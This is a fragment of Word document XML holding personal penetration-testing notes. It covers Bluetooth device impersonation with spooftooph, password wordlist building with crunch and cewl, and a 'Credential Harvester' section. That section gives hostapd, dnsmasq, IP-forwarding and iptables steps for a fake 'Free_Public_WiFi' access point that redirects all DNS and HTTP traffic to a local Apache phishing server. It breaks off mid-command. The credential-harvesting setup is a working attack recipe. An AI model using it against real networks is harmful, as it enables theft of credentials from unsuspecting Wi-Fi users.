      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> devices </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nerby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="589DE680" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hcitool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA0ACD1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">7/3. To </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>inpersonate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> USB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B12B27A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- After the Scan// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>spooftooph</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> hci0 -a (MAC ADDR) -n (TARGETNAME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1755E962" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="55E72034" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Making Custom Wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECB4F4C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">You can use tools like: Crunch or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>cewl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78ADD95E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t>Making custom wordlist can save tons of time and make it easy to find new ways to input a password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4078E548" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>using crunch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7900D7FD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> crunch 3 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>minumum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> word count) 5 (maximum word count) -o [Name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306B0723" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">Usage: Use this when you have a specific password in mind but want different variations </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD97DE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>cewl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FB7E46E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>cewl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> [domain name] -m 9 (minimum word count) -w [name] --meta (includes meta options aka: gains info from site deeper layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3466D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">Usage: Use when targeting a website that you think you could gain information from </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A717DBE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="4EF1BA10" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Changing and editing the APACHE2 SEVRER SOURCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7BE210" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/apache2/sites-enabled/000-default.conf // This is the settings for everything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9C4904" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>DocumentRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> /var/www/html // Changes it back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>defualt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FAA0A0D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="59506844" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="7CBCE6D8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Credential Harvester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F0ED1E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- Things to take in mind: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C59375" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">-Make sure that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>IpTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> is set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B6B736" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">-Make sure that you have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F65F1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>-Make Sure Apache2 server is up and on the right Server Source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E16816C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Hostapd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Dnsmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> Configuration setting are in ~ or /home/gdsj05/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40701940" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">-Enable IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>fowarding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27858BC9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Things to do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49506833" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- Set up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> using command // </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dnsmasq.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> // This makes sure that the Ip can go through the DNS to get to my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>IPtable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CBA3FA0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- Set up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> Adapter and assign its IP // Plug it in and select it in devices // use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> add 10.0.0.1/24 dev wlan0 // make sure that """ Ip </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> and DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>""" are similar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0027A177" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> Adapter using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hostapd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> (A little better than </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-ng due to not killing network manager) // </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hostapd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hostapd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> // This starts the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> signal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B69F886" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- Start Apache2 Server // </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6FD92F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="0CEBEA9C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>TroubleShoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="519427AE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve"> # Configure DNS/DHCP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dnsmasq.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC32337" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>interface=wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482AC920" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-range=10.0.0.10,10.0.0.100,12h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C72A9CB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>address=/#/10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E88A11" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve"># Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0505864C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -C /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dnsmasq.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FFDB61A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="033FC889" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Hostapd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FCCF04" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>interface=wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E9C7B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>driver=nl80211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E5E4DE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Free_Public_WiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7689C561" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hw_mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>=g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6604F0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>channel=6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD837D7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>auth_algs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E305F9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ignore_broadcast_ssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17691D9E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="36A1E90D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t># Enable IP forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C766977" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sysctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -w net.ipv4.ip_forward=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B900F3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="05665AE6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t># Redirect all HTTP traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B9DD41" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> iptables -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -F</w:t>
      </w:r>
    </w:p>
